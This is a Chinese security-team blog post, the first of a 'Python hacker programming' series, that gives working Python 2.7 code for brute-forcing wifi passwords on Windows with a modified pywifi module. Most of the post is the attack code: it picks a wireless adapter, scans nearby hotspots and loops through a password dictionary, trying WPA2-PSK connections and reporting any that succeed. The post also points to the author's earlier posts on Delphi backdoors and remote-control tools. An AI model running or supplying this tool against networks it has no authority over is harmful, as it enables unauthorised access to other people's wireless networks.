5ecurity技术团队

砥砺奋进
不断前行

PYTHON黑客编程(一):wifi密码暴力破解

前几篇文章主要介绍了使用delphi开发后门及简单的远控的知识,有小伙伴说delphi已经过时了没人用了,但是笔者觉得编程语言只是实现功能的一种方式,使用你熟悉或者喜欢的语言即可。
DELPHI黑客编程(一):正向后门原理实现
DELPHI黑客编程(二):反弹后门原理实现
DELPHI黑客编程(三):简单远控原理实现

在最近的公司项目开发中接触到python语言及wifi相关的一些知识,正好将最近学到的和大家分享一下。

0x0001 开发环境:

windows 10+python2.7.15

0x0002 开发目标:

开发基于字典破解wifi热点密码的小工具

在开发这个工具的时候笔者现在网上搜索到了一些项目,但都是linux下的,不能直接用于windows平台,因此就决定结合找到的linux下的项目,修改成windows下可运行的。
首先找到文章《一个非常简单易懂的WIFI密码爆破python脚本》https://my.oschina.net/Apathy/blog/821039,但是文章中说使用了pywifi模块,“这个模块在win下有点鸡肋,作者在调用WLANAPI时没有做好WLAN_SECURITY_ATTRIBUTES的封装,所以推荐在linux下跑,我测试所使用的是Kali 2.0 自带python 2.7.6 ,可直接通过 pip install pywifi 安装。”但笔者在测试的时候发现,在windows下还是可以运行的,因为要对这个模块的源代码进行一些修改,所以就没有安装模块,而是直接拷贝模块的源代码到项目目录下。

0x0003 模块的修改:

在使用模块自带的测试用例时候,发现print输出了很多无用的信息,因此在_wifiutil_win.py的335行去掉对“show_my_need_info”的调用。

0x0004 程序执行流程

功能需求比较清晰,因此我们的步骤如下:
1、获得本机无线网卡信息
2、扫描周围wifi热点
3、使用字典尝试连接wifi热点
4、输出扫描结果

按照上面的流程就可以编写代码了。

0x0005 代码实现

获得无线网信息

引用模块后,主要使用interfaces函数获取本机无线网卡信息,具体代码封装如下:

def get_wifi_interface():
    wifi = PyWiFi()
    if len(wifi.interfaces()) <= 0:
        print u'未找到无线网卡接口!'
        exit()
    if len(wifi.interfaces()) == 1:
        print u'无线网卡接口: %s'%(wifi.interfaces()[0].name())
        return wifi.interfaces()[0]
    else:
        print '%-4s   %s'%(u'序号',u'网卡接口名称')
        for i,w in enumerate(wifi.interfaces()):
            print '%-4s   %s'%(i,w.name())
        while True:
            iface_no = raw_input('请选择网卡接口序号:'.decode('utf-8').encode('gbk'))
            no = int(iface_no)
            if no>=0 and no < len(wifi.interfaces()):
                return wifi.interfaces()[no]

扫描周围热点

主要通过scan函数获得scan_results结果,具体代码封装如下,这里sleep(2)是因为测试的时候本机的无线网卡返回信息需要一些时间,当然如果你的网卡性能好,可以去掉这个sleep:

def scan(face):
    face.scan()
    time.sleep(2) 
    return face.scan_results()

尝试连接(破解密码)

密码破解这里先要定义一个Profile,然后再将Profile作为参数调用connect进行连接尝试,使用status函数取连接结果的返回值,如果是const.IFACE_CONNECTED则连接成功,显示结果,如果是其他则为失败。

def test(i,face,x,key,stu,ts):
    showID = x.bssid if len(x.ssid)==0 or x.ssid=='\\x00' or len(x.ssid)>len(x.bssid) else x.ssid
    key_index = 0
    while key_index < len(key):
        k = key[key_index]
        x.key = k.strip()
        face.remove_all_network_profiles()
        profile = Profile()
        profile.ssid = x.ssid
        profile.auth = const.AUTH_ALG_OPEN
        profile.akm.append(const.AKM_TYPE_WPA2PSK)
        profile.cipher = const.CIPHER_TYPE_CCMP
        profile.key = x.key
        face.connect(face.add_network_profile(profile))
        code = -1
        t1 = time.time()
        now = time.time() - t1
        while True:
            time.sleep(0.1)
            code = face.status()
            now = time.time()-t1
            if now>ts:
                break
            stu.write("\r%-6s| %-18s| %5.2fs | %-6s %-15s | %-12s"%(i,showID,now,len(key)-key_index,k.strip(),get_iface_status(code)))
            stu.flush()
            if code == const.IFACE_DISCONNECTED :
                break
            elif code == const.IFACE_CONNECTED:
                face.disconnect()
                stu.write("\r%-6s| %-18s| %5.2fs | %-6s %-15s | %-12s\n"%(i,showID,now,len(key)-key_index,k.strip(),u'**成功!**'))
                stu.flush()
                return "%-20s | %s | %15s"%(x.ssid,x.bssid,k)
        key_index = key_index + 1

    stu.write("\r%-6s| %-18s| %-6s | %-6s %-15s | %-12s\n"%(i,showID,'','','',u'失败!'))
    stu.flush()
    return False

主要代码如上,运行效果如下:

1.png

问题

这里有一个问题,就是pywifi模块的windows版本的代码里并没有实现获取wifi热点的加密状态信息,比如是使用WPA、WPA2、WPA2PSK还是WPAPSK方式加密认证的,因此我就默认将所有的wifi热点看作是开启了加密认证的,并在破解的时候视为“profile.akm.append(const.AKM_TYPE_WPA2PSK)”进行破解尝试。

参考

1、一个非常简单易懂的WIFI密码爆破python脚本https://my.oschina.net/Apathy/blog/821039
2、https://github.com/hanc00l/wifitest

未经允许不得转载:5ecurity技术团队 » PYTHON黑客编程(一):wifi密码暴力破解

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址